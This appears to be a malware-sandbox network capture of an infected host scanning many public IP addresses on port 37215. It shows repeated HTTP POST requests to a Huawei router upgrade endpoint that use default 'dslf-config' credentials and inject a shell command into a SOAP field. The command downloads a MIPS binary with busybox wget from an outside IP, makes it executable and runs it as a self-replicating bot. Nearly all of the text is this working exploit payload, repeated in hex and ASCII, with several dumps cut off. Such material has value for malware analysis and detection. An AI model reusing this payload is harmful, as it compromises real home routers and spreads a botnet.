                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  739192.168.2.1347862157.143.98.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.414133072 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  740192.168.2.1343178124.113.177.8737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.414220095 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  741192.168.2.134682041.246.202.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.414233923 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  742192.168.2.134070044.89.114.4437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.414674997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  743192.168.2.1358294197.191.81.14037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.414676905 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  744192.168.2.135120641.127.173.14037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.414747953 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  745192.168.2.1356742197.197.7.20637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.414812088 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  746192.168.2.1352776164.156.176.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.414874077 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  747192.168.2.1338880157.65.220.22537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.414952993 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  748192.168.2.134771641.237.196.17937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.414973021 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 